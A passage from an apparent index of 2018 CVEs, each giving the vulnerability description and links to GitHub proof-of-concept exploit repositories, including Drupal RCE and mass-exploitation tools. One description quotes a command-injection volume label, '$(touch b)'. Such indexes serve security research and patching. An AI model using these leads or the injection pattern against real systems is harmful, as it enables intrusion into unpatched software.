- [Zeeshan12340/CVE-2018-6574](https://github.com/Zeeshan12340/CVE-2018-6574)
- [moTorky/CVE-2018-6574-POC](https://github.com/moTorky/CVE-2018-6574-POC)
- [Ashved9/Orange](https://github.com/Ashved9/Orange)
- [zerbaliy3v/cve-2018-6574-exploit](https://github.com/zerbaliy3v/cve-2018-6574-exploit)
- [jftierno/-CVE-2018-6574](https://github.com/jftierno/-CVE-2018-6574)
- [faiqu3/cve-2018-6574](https://github.com/faiqu3/cve-2018-6574)
- [Dannners/CVE-2018-6574-go-get-RCE](https://github.com/Dannners/CVE-2018-6574-go-get-RCE)
- [bme2003/CVE-2018-6574](https://github.com/bme2003/CVE-2018-6574)
- [iNoSec2/cve-2018-6574](https://github.com/iNoSec2/cve-2018-6574)
- [ttyA0/cve-2018-6574](https://github.com/ttyA0/cve-2018-6574)
- [faqihudin13/CVE-2018-6574](https://github.com/faqihudin13/CVE-2018-6574)
- [lisu60/cve-2018-6574](https://github.com/lisu60/cve-2018-6574)
- [Saboor-Hakimi/CVE-2018-6574](https://github.com/Saboor-Hakimi/CVE-2018-6574)
### CVE-2018-6622 (2018-08-17)
An issue was discovered that affects all producers of BIOS firmware who make a certain realistic interpretation of an obscure portion of the Trusted Computing Group (TCG) Trusted Platform Module (TPM) 2.0 specification. An abnormal case is not handled properly by this firmware while S3 sleep and can clear TPM 2.0. It allows local users to overwrite static PCRs of TPM and neutralize the security features of it, such as seal/unseal and remote attestation.
- [kkamagui/napper-for-tpm](https://github.com/kkamagui/napper-for-tpm)
### CVE-2018-6643 (2018-08-28)
Infoblox NetMRI 7.1.1 has Reflected Cross-Site Scripting via the /api/docs/index.php query parameter.
- [undefinedmode/CVE-2018-6643](https://github.com/undefinedmode/CVE-2018-6643)
### CVE-2018-6789 (2018-02-08)
An issue was discovered in the base64d function in the SMTP listener in Exim before 4.90.1. By sending a handcrafted message, a buffer overflow may happen. This can be used to execute code remotely.
- [c0llision/exim-vuln-poc](https://github.com/c0llision/exim-vuln-poc)
- [beraphin/CVE-2018-6789](https://github.com/beraphin/CVE-2018-6789)
- [synacktiv/Exim-CVE-2018-6789](https://github.com/synacktiv/Exim-CVE-2018-6789)
- [martinclauss/exim-rce-cve-2018-6789](https://github.com/martinclauss/exim-rce-cve-2018-6789)
- [thistehneisen/CVE-2018-6789-Python3](https://github.com/thistehneisen/CVE-2018-6789-Python3)
### CVE-2018-6791 (2018-02-07)
An issue was discovered in soliduiserver/deviceserviceaction.cpp in KDE Plasma Workspace before 5.12.0. When a vfat thumbdrive that contains `` or $() in its volume label is plugged in and mounted through the device notifier, it's interpreted as a shell command, leading to a possibility of arbitrary command execution. An example of an offending volume label is "$(touch b)" -- this will create a file called b in the home folder.
- [rarar0/KDE_Vuln](https://github.com/rarar0/KDE_Vuln)
### CVE-2018-6890 (2018-02-22)
Cross-site scripting (XSS) vulnerability in Wolf CMS 0.8.3.1 via the page editing feature, as demonstrated by /?/admin/page/edit/3.
- [pradeepjairamani/WolfCMS-XSS-POC](https://github.com/pradeepjairamani/WolfCMS-XSS-POC)
### CVE-2018-6892 (2018-02-11)
An issue was discovered in CloudMe before 1.11.0. An unauthenticated remote attacker that can connect to the "CloudMe Sync" client application listening on port 8888 can send a malicious payload causing a buffer overflow condition. This will result in an attacker controlling the program's execution flow and allowing arbitrary code execution.
- [manojcode/CloudMe-Sync-1.10.9---Buffer-Overflow-SEH-DEP-Bypass](https://github.com/manojcode/CloudMe-Sync-1.10.9---Buffer-Overflow-SEH-DEP-Bypass)
- [manojcode/-Win10-x64-CloudMe-Sync-1.10.9-Buffer-Overflow-SEH-DEP-Bypass](https://github.com/manojcode/-Win10-x64-CloudMe-Sync-1.10.9-Buffer-Overflow-SEH-DEP-Bypass)
- [latortuga71/CVE-2018-6892-Golang](https://github.com/latortuga71/CVE-2018-6892-Golang)
### CVE-2018-6905 (2018-04-08)
The page module in TYPO3 before 8.7.11, and 9.1.0, has XSS via $GLOBALS['TYPO3_CONF_VARS']['SYS']['sitename'], as demonstrated by an admin entering a crafted site name during the installation process.
- [pradeepjairamani/TYPO3-XSS-POC](https://github.com/pradeepjairamani/TYPO3-XSS-POC)
- [dnr6419/CVE-2018-6905](https://github.com/dnr6419/CVE-2018-6905)
### CVE-2018-6961 (2018-06-11)
VMware NSX SD-WAN Edge by VeloCloud prior to version 3.1.0 contains a command injection vulnerability in the local web UI component. This component is disabled by default and should not be enabled on untrusted networks. VeloCloud by VMware will be removing this service from the product in future releases. Successful exploitation of this issue could result in remote code execution.
- [bokanrb/CVE-2018-6961](https://github.com/bokanrb/CVE-2018-6961)
- [r3dxpl0it/CVE-2018-6961](https://github.com/r3dxpl0it/CVE-2018-6961)
### CVE-2018-6981 (2018-12-04)
VMware ESXi 6.7 without ESXi670-201811401-BG and VMware ESXi 6.5 without ESXi650-201811301-BG, VMware ESXi 6.0 without ESXi600-201811401-BG, VMware Workstation 15, VMware Workstation 14.1.3 or below, VMware Fusion 11, VMware Fusion 10.1.3 or below contain uninitialized stack memory usage in the vmxnet3 virtual network adapter which may allow a guest to execute code on the host.
- [LxKxC/vmxnet3Hunter](https://github.com/LxKxC/vmxnet3Hunter)
### CVE-2018-7171 (2018-03-30)
Directory traversal vulnerability in Twonky Server 7.0.11 through 8.5 allows remote attackers to share the contents of arbitrary directories via a .. (dot dot) in the contentbase parameter to rpc/set_all.
- [mechanico/sharingIsCaring](https://github.com/mechanico/sharingIsCaring)
### CVE-2018-7197 (2018-02-18)
An issue was discovered in Pluck through 4.7.4. A stored cross-site scripting (XSS) vulnerability allows remote unauthenticated users to inject arbitrary web script or HTML into admin/blog Reaction Comments via a crafted URL.
- [Alyssa-o-Herrera/CVE-2018-7197](https://github.com/Alyssa-o-Herrera/CVE-2018-7197)
### CVE-2018-7211 (2018-02-18)
An issue was discovered in iDashboards 9.6b. The SSO implementation is affected by a weak obfuscation library, allowing man-in-the-middle attackers to discover credentials.
- [c3r34lk1ll3r/CVE-2018-7211-PoC](https://github.com/c3r34lk1ll3r/CVE-2018-7211-PoC)
### CVE-2018-7249 (2018-02-26)
An issue was discovered in secdrv.sys as shipped in Microsoft Windows Vista, Windows 7, Windows 8, and Windows 8.1 before KB3086255, and as shipped in Macrovision SafeDisc. Two carefully timed calls to IOCTL 0xCA002813 can cause a race condition that leads to a use-after-free. When exploited, an unprivileged attacker can run arbitrary code in the kernel.
- [Elvin9/NotSecDrv](https://github.com/Elvin9/NotSecDrv)
### CVE-2018-7250 (2018-02-26)
An issue was discovered in secdrv.sys as shipped in Microsoft Windows Vista, Windows 7, Windows 8, and Windows 8.1 before KB3086255, and as shipped in Macrovision SafeDisc. An uninitialized kernel pool allocation in IOCTL 0xCA002813 allows a local unprivileged attacker to leak 16 bits of uninitialized kernel PagedPool data.
- [Elvin9/SecDrvPoolLeak](https://github.com/Elvin9/SecDrvPoolLeak)
### CVE-2018-7273 (2018-02-21)
In the Linux kernel through 4.15.4, the floppy driver reveals the addresses of kernel functions and global variables using printk calls within the function show_floppy in drivers/block/floppy.c. An attacker can read this information from dmesg and use the addresses to find the locations of kernel code and data and bypass kernel security protections such as KASLR.
- [jedai47/CVE-2018-7273](https://github.com/jedai47/CVE-2018-7273)
### CVE-2018-7284 (2018-02-22)
A Buffer Overflow issue was discovered in Asterisk through 13.19.1, 14.x through 14.7.5, and 15.x through 15.2.1, and Certified Asterisk through 13.18-cert2. When processing a SUBSCRIBE request, the res_pjsip_pubsub module stores the accepted formats present in the Accept headers of the request. This code did not limit the number of headers it processed, despite having a fixed limit of 32. If more than 32 Accept headers were present, the code would write outside of its memory and cause a crash.
- [Rodrigo-D/astDoS](https://github.com/Rodrigo-D/astDoS)
### CVE-2018-7422 (2018-03-19)
A Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php, aka absolute path traversal.
- [0x00-0x00/CVE-2018-7422](https://github.com/0x00-0x00/CVE-2018-7422)
- [jessisec/CVE-2018-7422](https://github.com/jessisec/CVE-2018-7422)
- [JacobEbben/CVE-2018-7422](https://github.com/JacobEbben/CVE-2018-7422)
### CVE-2018-7448 (2018-02-26)
Remote code execution vulnerability in /cmsms-2.1.6-install.php/index.php in CMS Made Simple version 2.1.6 allows remote attackers to inject arbitrary PHP code via the "timezone" parameter in step 4 of a fresh installation procedure.
- [b1d0ws/exploit-cve-2018-7448](https://github.com/b1d0ws/exploit-cve-2018-7448)
### CVE-2018-7449 (2018-03-04)
SEGGER FTP Server for Windows before 3.22a allows remote attackers to cause a denial of service (daemon crash) via an invalid LIST, STOR, or RETR command.
- [antogit-sys/CVE-2018-7449](https://github.com/antogit-sys/CVE-2018-7449)
### CVE-2018-7489 (2018-02-26)
FasterXML jackson-databind before 2.7.9.3, 2.8.x before 2.8.11.1 and 2.9.x before 2.9.5 allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the c3p0 libraries are available in the classpath.
- [tafamace/CVE-2018-7489](https://github.com/tafamace/CVE-2018-7489)
### CVE-2018-7490 (2018-02-26)
uWSGI before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the --php-docroot option, allowing directory traversal.
- [qinzhu111/uWSGI-CVE-2018-7490-POC](https://github.com/qinzhu111/uWSGI-CVE-2018-7490-POC)
### CVE-2018-7600 (2018-03-29)
Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.
- [g0rx/CVE-2018-7600-Drupal-RCE](https://github.com/g0rx/CVE-2018-7600-Drupal-RCE)
- [a2u/CVE-2018-7600](https://github.com/a2u/CVE-2018-7600)
- [dreadlocked/Drupalgeddon2](https://github.com/dreadlocked/Drupalgeddon2)
- [knqyf263/CVE-2018-7600](https://github.com/knqyf263/CVE-2018-7600)
- [dr-iman/CVE-2018-7600-Drupal-0day-RCE](https://github.com/dr-iman/CVE-2018-7600-Drupal-0day-RCE)
- [jirojo2/drupalgeddon2](https://github.com/jirojo2/drupalgeddon2)
- [dwisiswant0/CVE-2018-7600](https://github.com/dwisiswant0/CVE-2018-7600)
- [thehappydinoa/CVE-2018-7600](https://github.com/thehappydinoa/CVE-2018-7600)
- [sl4cky/CVE-2018-7600](https://github.com/sl4cky/CVE-2018-7600)
- [sl4cky/CVE-2018-7600-Masschecker](https://github.com/sl4cky/CVE-2018-7600-Masschecker)
- [firefart/CVE-2018-7600](https://github.com/firefart/CVE-2018-7600)
- [pimps/CVE-2018-7600](https://github.com/pimps/CVE-2018-7600)
- [lorddemon/drupalgeddon2](https://github.com/lorddemon/drupalgeddon2)
- [Hestat/drupal-check](https://github.com/Hestat/drupal-check)
- [Damian972/drupalgeddon-2](https://github.com/Damian972/drupalgeddon-2)
- [soch4n/CVE-2018-7600](https://github.com/soch4n/CVE-2018-7600)
- [happynote3966/CVE-2018-7600](https://github.com/happynote3966/CVE-2018-7600)
- [shellord/CVE-2018-7600-Drupal-RCE](https://github.com/shellord/CVE-2018-7600-Drupal-RCE)
- [r3dxpl0it/CVE-2018-7600](https://github.com/r3dxpl0it/CVE-2018-7600)
- [cved-sources/cve-2018-7600](https://github.com/cved-sources/cve-2018-7600)
- [madneal/codeql-scanner](https://github.com/madneal/codeql-scanner)
- [drugeddon/drupal-exploit](https://github.com/drugeddon/drupal-exploit)
- [shellord/Drupalgeddon-Mass-Exploiter](https://github.com/shellord/Drupalgeddon-Mass-Exploiter)
- [zhzyker/CVE-2018-7600-Drupal-POC-EXP](https://github.com/zhzyker/CVE-2018-7600-Drupal-POC-EXP)
- [rabbitmask/CVE-2018-7600-Drupal7](https://github.com/rabbitmask/CVE-2018-7600-Drupal7)
- [ynsmroztas/drupalhunter](https://github.com/ynsmroztas/drupalhunter)
- [ruthvikvegunta/Drupalgeddon2](https://github.com/ruthvikvegunta/Drupalgeddon2)
- [ludy-dev/drupal8-REST-RCE](https://github.com/ludy-dev/drupal8-REST-RCE)
- [0xAJ2K/CVE-2018-7600](https://github.com/0xAJ2K/CVE-2018-7600)
- [rafaelcaria/drupalgeddon2-CVE-2018-7600](https://github.com/rafaelcaria/drupalgeddon2-CVE-2018-7600)
- [vphnguyen/ANM_CVE-2018-7600](https://github.com/vphnguyen/ANM_CVE-2018-7600)
- [0xConstant/CVE-2018-7600](https://github.com/0xConstant/CVE-2018-7600)
- [anldori/CVE-2018-7600](https://github.com/anldori/CVE-2018-7600)
- [r0lh/CVE-2018-7600](https://github.com/r0lh/CVE-2018-7600)
- [killeveee/CVE-2018-7600](https://github.com/killeveee/CVE-2018-7600)
- [raytran54/CVE-2018-7600](https://github.com/raytran54/CVE-2018-7600)
### CVE-2018-7602 (2018-07-19)
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.
- [1337g/Drupalgedon3](https://github.com/1337g/Drupalgedon3)
- [happynote3966/CVE-2018-7602](https://github.com/happynote3966/CVE-2018-7602)
- [kastellanos/CVE-2018-7602](https://github.com/kastellanos/CVE-2018-7602)
- [cyberharsh/DrupalCVE-2018-7602](https://github.com/cyberharsh/DrupalCVE-2018-7602)
- [132231g/CVE-2018-7602](https://github.com/132231g/CVE-2018-7602)
### CVE-2018-7669 (2018-04-27)
An issue was discovered in Sitecore Sitecore.NET 8.1 rev. 151207 Hotfix 141178-1 and above. The 'Log Viewer' application is vulnerable to a directory traversal attack, allowing an attacker to access arbitrary files from the host Operating System using a sitecore/shell/default.aspx?xmlcontrol=LogViewerDetails&file= URI. Validation is performed to ensure that the text passed to the 'file' parameter correlates to the correct log file directory. This filter can be bypassed by including a valid log filename and then appending a traditional 'dot dot' style attack.
- [palaziv/CVE-2018-7669](https://github.com/palaziv/CVE-2018-7669)
### CVE-2018-7690 (2018-12-13)
A potential Remote Unauthorized Access in Micro Focus Fortify Software Security Center (SSC), versions 17.10, 17.20, 18.10 this exploitation could allow Remote Unauthorized Access
- [alt3kx/CVE-2018-7690](https://github.com/alt3kx/CVE-2018-7690)
### CVE-2018-7691 (2018-12-13)
A potential Remote Unauthorized Access in Micro Focus Fortify Software Security Center (SSC), versions 17.10, 17.20, 18.10 this exploitation could allow Remote Unauthorized Access
- [alt3kx/CVE-2018-7691](https://github.com/alt3kx/CVE-2018-7691)
### CVE-2018-7747 (2018-04-20)
Multiple cross-site scripting (XSS) vulnerabilities in the Caldera Forms plugin before 1.6.0-rc.1 for WordPress allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) a greeting message, (2) the email transaction log, or (3) an imported form.
- [mindpr00f/CVE-2018-7747](https://github.com/mindpr00f/CVE-2018-7747)
### CVE-2018-7750 (2018-03-13)
transport.py in the SSH server implementation of Paramiko before 1.17.6, 1.18.x before 1.18.5, 2.0.x before 2.0.8, 2.1.x before 2.1.5, 2.2.x before 2.2.3, 2.3.x before 2.3.2, and 2.4.x before 2.4.1 does not properly check whether authentication is completed before processing other requests, as demonstrated by channel-open. A customized SSH client can simply skip the authentication step.
- [jm33-m0/CVE-2018-7750](https://github.com/jm33-m0/CVE-2018-7750)
### CVE-2018-7842 (2019-05-22)
A CWE-290: Authentication Bypass by Spoofing vulnerability exists in all versions of the Modicon M580, Modicon M340, Modicon Quantum, and Modicon Premium which could cause an elevation of privilege by conducting a brute force attack on Modbus parameters sent to the controller.
- [yanissec/CVE-2018-7842](https://github.com/yanissec/CVE-2018-7842)
### CVE-2018-7843 (2019-05-22)
A CWE-248: Uncaught Exception vulnerability exists in all versions of the Modicon M580, Modicon M340, Modicon Quantum, and Modicon Premium which could cause denial of service when reading memory blocks with an invalid data size or with an invalid data offset in the controller over Modbus.
- [yanissec/CVE-2018-7843](https://github.com/yanissec/CVE-2018-7843)
### CVE-2018-7844 (2019-05-22)
A CWE-200: Information Exposure vulnerability exists in all versions of the Modicon M580, Modicon M340, Modicon Quantum, and Modicon Premium which could cause the disclosure of SNMP information when reading memory blocks from the controller over Modbus.
- [yanissec/CVE-2018-7844](https://github.com/yanissec/CVE-2018-7844)
### CVE-2018-7845 (2019-05-22)
A CWE-125: Out-of-bounds Read vulnerability exists in all versions of the Modicon M580, Modicon M340, Modicon Quantum, and Modicon Premium which could cause the disclosure of unexpected data from the controller when reading specific memory blocks in the controller over Modbus.
- [yanissec/CVE-2018-7845](https://github.com/yanissec/CVE-2018-7845)
### CVE-2018-7846 (2019-05-22)
A CWE-501: Trust Boundary Violation vulnerability on connection to the Controller exists in all versions of the Modicon M580, Modicon M340, Modicon Quantum and Modicon Premium which could cause unauthorized access by conducting a brute force attack on Modbus protocol to the controller.
- [yanissec/CVE-2018-7846](https://github.com/yanissec/CVE-2018-7846)
### CVE-2018-7848 (2019-05-22)
A CWE-200: Information Exposure vulnerability exists in all versions of the Modicon M580, Modicon M340, Modicon Quantum, and Modicon Premium which could cause the disclosure of SNMP information when reading files from the controller over Modbus
- [yanissec/CVE-2018-7848](https://github.com/yanissec/CVE-2018-7848)
### CVE-2018-7849 (2019-05-22)
A CWE-248: Uncaught Exception vulnerability exists in all versions of the Modicon M580, Modicon M340, Modicon Quantum and Modicon Premium which could cause a possible Denial of Service due to improper data integrity check when sending files the controller over Modbus.
- [yanissec/CVE-2018-7849](https://github.com/yanissec/CVE-2018-7849)
### CVE-2018-7852 (2019-05-22)
A CWE-248: Uncaught Exception vulnerability exists in all versions of the Modicon M580, Modicon M340, Modicon Quantum, and Modicon Premium which could cause denial of service when an invalid private command parameter is sent to the controller over Modbus.
- [yanissec/CVE-2018-7852](https://github.com/yanissec/CVE-2018-7852)
### CVE-2018-7854 (2019-05-22)
A CWE-248 Uncaught Exception vulnerability exists in all versions of the Modicon M580, Modicon M340, Modicon Quantum, and Modicon Premium which could cause a denial of Service when sending invalid debug parameters to the controller over Modbus.
- [yanissec/CVE-2018-7854](https://github.com/yanissec/CVE-2018-7854)
### CVE-2018-7935 (2023-02-10)
\nThere is a vulnerability in 21.328.01.00.00 version of the E5573Cs-322. Remote attackers could exploit this vulnerability to make the network where the E5573Cs-322 is running temporarily unavailable.\n\n
- [lawrenceamer/CVE-2018-7935](https://github.com/lawrenceamer/CVE-2018-7935)
### CVE-2018-8004 (2018-08-29)
There are multiple HTTP smuggling and cache poisoning issues when clients making malicious requests interact with Apache Traffic Server (ATS). This affects versions 6.0.0 to 6.2.2 and 7.0.0 to 7.1.3. To resolve this issue users running 6.x should upgrade to 6.2.3 or later versions and 7.x users should upgrade to 7.1.4 or later versions.
- [mosesrenegade/CVE-2018-8004](https://github.com/mosesrenegade/CVE-2018-8004)
### CVE-2018-8021 (2018-11-07)
Versions of Superset prior to 0.23 used an unsafe load method from the pickle library to deserialize data leading to possible remote code execution. Note Superset 0.23 was released prior to any Superset release under the Apache Software Foundation.
- [r3dxpl0it/Apache-Superset-Remote-Code-Execution-PoC-CVE-2018-8021](https://github.com/r3dxpl0it/Apache-Superset-Remote-Code-Execution-PoC-CVE-2018-8021)
### CVE-2018-8032 (2018-08-02)
Apache Axis 1.x up to and including 1.4 is vulnerable to a cross-site scripting (XSS) attack in the default servlet/services.
- [cairuojin/CVE-2018-8032](https://github.com/cairuojin/CVE-2018-8032)
### CVE-2018-8033 (2018-12-13)
In Apache OFBiz 16.11.01 to 16.11.04, the OFBiz HTTP engine (org.apache.ofbiz.service.engine.HttpEngine.java) handles requests for HTTP services via the /webtools/control/httpService endpoint. Both POST and GET requests to the httpService endpoint may contain three parameters: serviceName, serviceMode, and serviceContext. The exploitation occurs by having DOCTYPEs pointing to external references that trigger a payload that returns secret information from the host.
- [Cappricio-Securities/CVE-2018-8033](https://github.com/Cappricio-Securities/CVE-2018-8033)
### CVE-2018-8038 (2018-07-05)
Versions of Apache CXF Fediz prior to 1.4.4 do not fully disable Document Type Declarations (DTDs) when either parsing the Identity Provider response in the application plugins, or in the Identity Provider itself when parsing certain XML-based parameters.
- [tafamace/CVE-2018-8038](https://github.com/tafamace/CVE-2018-8038)
### CVE-2018-8039 (2018-07-02)
It is possible to configure Apache CXF to use the com.sun.net.ssl implementation via 'System.setProperty("java.protocol.handler.pkgs", "com.sun.net.ssl.internal.www.protocol");'. When this system property is set, CXF uses some reflection to try to make the HostnameVerifier work with the old com.sun.net.ssl.HostnameVerifier interface. However, the default HostnameVerifier implementation in CXF does not implement the method in this interface, and an exception is thrown. However, in Apache CXF prior to 3.2.5 and 3.1.16 the exception is caught in the reflection code and not properly propagated. What this means is that if you are using the com.sun.net.ssl stack with CXF, an error with TLS hostname verification will not be thrown, leaving a CXF client subject to man-in-the-middle attacks.
- [tafamace/CVE-2018-8039](https://github.com/tafamace/CVE-2018-8039)
### CVE-2018-8045 (2018-03-14)
In Joomla! 3.5.0 through 3.8.5, the lack of type casting of a variable in a SQL statement leads to a SQL injection vulnerability in the User Notes list view.
- [luckybool1020/CVE-2018-8045](https://github.com/luckybool1020/CVE-2018-8045)
### CVE-2018-8060 (2018-05-10)
HWiNFO AMD64 Kernel driver version 8.98 and lower allows an unprivileged user to send an IOCTL to the device driver. If input and/or output buffer pointers are NULL or if these buffers' data are invalid, a NULL/invalid pointer access occurs, resulting in a Windows kernel panic aka Blue Screen. This affects IOCTLs higher than 0x85FE2600 with the HWiNFO32 symbolic device name.
- [otavioarj/SIOCtl](https://github.com/otavioarj/SIOCtl)
### CVE-2018-8062 (2020-10-23)
A cross-site scripting (XSS) vulnerability on Comtrend AR-5387un devices with A731-410JAZ-C04_R02.A2pD035g.d23i firmware allows remote attackers to inject arbitrary web script or HTML via the Service Description parameter while creating a WAN service.
- [OscarAkaElvis/CVE-2018-8062](https://github.com/OscarAkaElvis/CVE-2018-8062)
### CVE-2018-8065 (2018-03-12)
An issue was discovered in the web server in Flexense SyncBreeze Enterprise 10.6.24. There is a user mode write access violation on the syncbrs.exe memory region that can be triggered by rapidly sending a variety of HTTP requests with long HTTP header values or long URIs.
- [EgeBalci/CVE-2018-8065](https://github.com/EgeBalci/CVE-2018-8065)
### CVE-2018-8078 (2018-03-13)
YzmCMS 3.7 has Stored XSS via the title parameter to advertisement/adver/edit.html.
- [Jx0n0/YZMCMSxss](https://github.com/Jx0n0/YZMCMSxss)
### CVE-2018-8090 (2018-07-25)
Quick Heal Total Security 64 bit 17.00 (QHTS64.exe), (QHTSFT64.exe) - Version 10.0.1.38; Quick Heal Total Security 32 bit 17.00 (QHTS32.exe), (QHTSFT32.exe) - Version 10.0.1.38; Quick Heal Internet Security 64 bit 17.00 (QHIS64.exe), (QHISFT64.exe) - Version 10.0.0.37; Quick Heal Internet Security 32 bit 17.00 (QHIS32.exe), (QHISFT32.exe) - Version 10.0.0.37; Quick Heal AntiVirus Pro 64 bit 17.00 (QHAV64.exe), (QHAVFT64.exe) - Version 10.0.0.37; and Quick Heal AntiVirus Pro 32 bit 17.00 (QHAV32.exe), (QHAVFT32.exe) - Version 10.0.0.37 allow DLL Hijacking because of Insecure Library Loading.
- [kernelm0de/CVE-2018-8090](https://github.com/kernelm0de/CVE-2018-8090)
### CVE-2018-8097 (2018-03-14)
io/mongo/parser.py in Eve (aka pyeve) before 0.7.5 allows remote attackers to execute arbitrary code via Code Injection in the where parameter.
- [SilentVoid13/CVE-2018-8097](https://github.com/SilentVoid13/CVE-2018-8097)
### CVE-2018-8108 (2018-03-14)
The select component in bui through 2018-03-13 has XSS because it performs an escape operation on already-escaped text, as demonstrated by workGroupList text.
- [zlgxzswjy/BUI-select-xss](https://github.com/zlgxzswjy/BUI-select-xss)
### CVE-2018-8115 (2018-05-02)
A remote code execution vulnerability exists when the Windows Host Compute Service Shim (hcsshim) library fails to properly validate input while importing a container image, aka "Windows Host Compute Service Shim Remote Code Execution Vulnerability." This affects Windows Host Compute.
- [aquasecurity/scan-cve-2018-8115](https://github.com/aquasecurity/scan-cve-2018-8115)
### CVE-2018-8120 (2018-05-09)
An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka "Win32k Elevation of Privilege Vulnerability." This affects Windows Server 2008, Windows 7, Windows Server 2008 R2. This CVE ID is unique from CVE-2018-8124, CVE-2018-8164, CVE-2018-8166.
- [bigric3/cve-2018-8120](https://github.com/bigric3/cve-2018-8120)
- [rip1s/CVE-2018-8120](https://github.com/rip1s/CVE-2018-8120)
- [ne1llee/cve-2018-8120](https://github.com/ne1llee/cve-2018-8120)
- [alpha1ab/CVE-2018-8120](https://github.com/alpha1ab/CVE-2018-8120)
- [EVOL4/CVE-2018-8120](https://github.com/EVOL4/CVE-2018-8120)
- [ozkanbilge/CVE-2018-8120](https://github.com/ozkanbilge/CVE-2018-8120)
- [qiantu88/CVE-2018-8120](https://github.com/qiantu88/CVE-2018-8120)
- [Y0n0Y/cve-2018-8120-exp](https://github.com/Y0n0Y/cve-2018-8120-exp)
- [StartZYP/CVE-2018-8120](https://github.com/StartZYP/CVE-2018-8120)
- [wikiZ/cve-2018-8120](https://github.com/wikiZ/cve-2018-8120)
### CVE-2018-8172 (2018-07-11)
A remote code execution vulnerability exists in Visual Studio software when the software does not check the source markup of a file for an unbuilt project, aka "Visual Studio Remote Code Execution Vulnerability." This affects Microsoft Visual Studio, Expression Blend 4.
- [SyFi/CVE-2018-8172](https://github.com/SyFi/CVE-2018-8172)
### CVE-2018-8174 (2018-05-09)
A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory, aka "Windows VBScript Engine Remote Code Execution Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.
- [0x09AL/CVE-2018-8174-msf](https://github.com/0x09AL/CVE-2018-8174-msf)
- [Yt1g3r/CVE-2018-8174_EXP](https://github.com/Yt1g3r/CVE-2018-8174_EXP)
- [SyFi/CVE-2018-8174](https://github.com/SyFi/CVE-2018-8174)
- [orf53975/Rig-Exploit-for-CVE-2018-8174](https://github.com/orf53975/Rig-Exploit-for-CVE-2018-8174)
- [piotrflorczyk/cve-2018-8174_analysis](https://github.com/piotrflorczyk/cve-2018-8174_analysis)
- [likekabin/CVE-2018-8174-msf](https://github.com/likekabin/CVE-2018-8174-msf)
- [ruthlezs/ie11_vbscript_exploit](https://github.com/ruthlezs/ie11_vbscript_exploit)
- [ericisnotrealname/CVE-2018-8174_EXP](https://github.com/ericisnotrealname/CVE-2018-8174_EXP)
- [www201001/https-github.com-iBearcat-CVE-2018-8174_EXP](https://github.com/www201001/https-github.com-iBearcat-CVE-2018-8174_EXP)
- [www201001/https-github.com-iBearcat-CVE-2018-8174_EXP.git-](https://github.com/www201001/https-github.com-iBearcat-CVE-2018-8174_EXP.git-)
- [delina1/CVE-2018-8174](https://github.com/delina1/CVE-2018-8174)
- [delina1/CVE-2018-8174_EXP](https://github.com/delina1/CVE-2018-8174_EXP)
- [DarkFlameMaster-bit/CVE-2018-8174_EXP](https://github.com/DarkFlameMaster-bit/CVE-2018-8174_EXP)
- [lisinan988/CVE-2018-8174-exp](https://github.com/lisinan988/CVE-2018-8174-exp)
- [sinisterghost/https-github.com-iBearcat-CVE-2018-8174_EXP](https://github.com/sinisterghost/https-github.com-iBearcat-CVE-2018-8174_EXP)
### CVE-2018-8208 (2018-06-14)
An elevation of privilege vulnerability exists in Windows when Desktop Bridge does not properly manage the virtual registry, aka "Windows Desktop Bridge Elevation of Privilege Vulnerability." This affects Windows Server 2016, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-8214.
- [kaisaryousuf/CVE-2018-8208](https://github.com/kaisaryousuf/CVE-2018-8208)
### CVE-2018-8214 (2018-06-14)
An elevation of privilege vulnerability exists in Windows when Desktop Bridge does not properly manage the virtual registry, aka "Windows Desktop Bridge Elevation of Privilege Vulnerability." This affects Windows Server 2016, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-8208.
- [guwudoor/CVE-2018-8214](https://github.com/guwudoor/CVE-2018-8214)
### CVE-2018-8284 (2018-07-11)
A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly, aka ".NET Framework Remote Code Injection Vulnerability." This affects Microsoft .NET Framework 2.0, Microsoft .NET Framework 3.0, Microsoft .NET Framework 4.6.2/4.7/4.7.1/4.7.2, Microsoft .NET Framework 4.5.2, Microsoft .NET Framework 4.6, Microsoft .NET Framework 4.7/4.7.1/4.7.2, Microsoft .NET Framework 4.7.1/4.7.2, Microsoft .NET Framework 3.5, Microsoft .NET Framework 3.5.1, Microsoft .NET Framework 4.6/4.6.1/4.6.2, Microsoft .NET Framework 4.6/4.6.1/4.6.2/4.7/4.7.1/4.7.1/4.7.2, Microsoft .NET Framework 4.7.2.
- [quantiti/CVE-2018-8284-Sharepoint-RCE](https://github.com/quantiti/CVE-2018-8284-Sharepoint-RCE)
### CVE-2018-8353 (2018-08-15)
A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka "Scripting Engine Memory Corruption Vulnerability." This affects Internet Explorer 9, Internet Explorer 11, Internet Explorer 10. This CVE ID is unique from CVE-2018-8355, CVE-2018-8359, CVE-2018-8371, CVE-2018-8372, CVE-2018-8373, CVE-2018-8385, CVE-2018-8389, CVE-2018-8390.
- [whereisr0da/CVE-2018-8353-POC](https://github.com/whereisr0da/CVE-2018-8353-POC)
### CVE-2018-8389 (2018-08-15)
